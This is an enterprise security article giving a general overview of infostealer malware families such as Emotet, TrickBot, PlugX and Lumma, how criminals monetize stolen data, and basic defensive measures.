The Rise of Infostealer Malware and Its Monetization in Enterprises

In the continually changing landscape of cyber threats, Infostealer malware has emerged as a formidable adversary for enterprises. These malicious programs are designed to covertly collect sensitive information from infected systems, posing huge risks to businesses of all sizes. Infostealers target a wide range of information, including financial information, login credentials, confidential documents and intellectual property. Understanding the rise of Infostealer malware and its comprehensive monetization strategies is crucial for maintaining robust defenses to protect enterprise environments.

The Proliferation of Infostealer Malware in Enterprises

Infostealer malware has gained traction within the enterprise sector for several reasons. The malware’s design enables efficient harvesting of valuable information with minimal user interaction. Cybercriminals employ sophisticated techniques such as phishing campaigns, malicious websites, and compromised software to distribute Infostealers, exploiting human vulnerabilities and technical weaknesses.

The rise of malware-as-a-service (MaaS) platforms has further facilitated the development and distribution of Infostealer malware. These platforms allow less technically skilled attackers to rent or purchase malware, lowering the barrier to entry for cybercrime. This democratization of cyber threats has led to an increase in the number and diversity of attacks targeting enterprises.

Real-World Examples of Infostealer Malware in Enterprises

1. Emotet Originally a banking Trojan, Emotet evolved into a highly modular malware that includes Infostealer capabilities. Emotet has been used to steal login credentials and financial information from enterprises, often serving as a precursor to ransomware attacks. Emotet’s operators lease access to compromised networks to other cybercriminals, creating a lucrative business model. Some of the Emotet gang were busted in January 2021 in Ukraine by Europol however within six months their bot net was back online. Emotet are notorious for exploiting Excel macros to propagate their initial malware loaders.
2. TrickBot TrickBot is another versatile malware that started as a banking Trojan but has expanded its capabilities to include information stealing. It targets a wide range of data, from financial information to network credentials. TrickBot has been used in targeted attacks against enterprises, often leading to further exploitation by ransomware groups like Ryuk.
3. PlugX PlugX is a sophisticated information-stealing malware, widely believed to originate from Chinese nation-state actors. It is primarily used to infiltrate government agencies and related organizations with the intent of exfiltrating sensitive data to gain strategic advantages. Around January 2022, a new variant of PlugX emerged which propagates through a USB worm which has caused tens of millions of infections across the globe. Embassies, medical and vaccine research organizations, and defense contractors are just some examples of the types of organizations that have fallen victim to PlugX.
4. Lumma Lumma is an information stealer malware designed to collect sensitive data from infected systems. It typically targets credentials, browser cookies, saved passwords, and other personal information from web browsers and applications. Luma spreads through malicious attachments, phishing emails, or compromised websites, stealthily gathering and transmitting stolen data to command-and-control servers operated by cybercriminals. Luma is particularly prevalent right now with a new form which propagates from socially engineering users into pasting PowerShell commands into ‘Run’ in Windows

Monetization and Utilization of Stolen Information

Once Infostealers successfully exfiltrate data from enterprise systems, cybercriminals have several avenues to monetize and utilize the stolen information:

1. Sale on Dark Web Marketplaces Stolen credentials and enterprise information are often sold on dark web marketplaces. These markets operate with relative anonymity, allowing cybercriminals to profit from the sale of large volumes of compromised data. Corporate email accounts, VPN credentials, and financial data can command high prices.
2. Account Takeovers and Fraud Cybercriminals use stolen credentials to gain unauthorized access to enterprise systems. These accounts can then be used to commit fraud, such as making unauthorized purchases, transferring funds, or even engaging in further cyberattacks. The financial impact on enterprises can be substantial, and the recovery process is often lengthy and challenging.
3. Ransom and Extortion Cybercriminals may also use stolen data to extort enterprises. By threatening to publicly release sensitive information, attackers can coerce businesses into paying a ransom. The fear of reputational damage or regulatory penalties often compels enterprises to comply with the attackers’ demands.
4. Strategic Advantages In the case of nation-states, stolen intellectual property and blueprints can be immensely valuable, providing governments with significant strategic advantages particularly in their defense capabilities. By acquiring confidential information related to advanced technologies, weapons systems, and military infrastructure, nation-states can accelerate their own defense development, bypass research and development costs, and potentially neutralize the military advantages of rival countries.

Defending Against Infostealers in Enterprises

To protect against the threat of Infostealer malware, enterprises must adopt a multi-layered approach to cybersecurity:

• Regularly updating and patching software to close vulnerabilities that could be exploited by malware.
• Implementing robust email filtering and web security solutions to block phishing attempts and malicious websites.
• Using strong, unique passwords for all accounts and enabling multi-factor authentication (MFA) to add an extra layer of security.
• Conducting regular security awareness training for employees to recognize and respond to phishing attempts and other social engineering tactics.
• Harden USB policies to prevent the risk of users inserting infected drives containing information stealing worms.

By understanding the rise and monetization of Infostealer malware, enterprises can better prepare to defend against this insidious threat. Proactive measures, combined with vigilance and continuous improvement of security practices, are essential in safeguarding enterprise environments from the pervasive threat of Infostealers.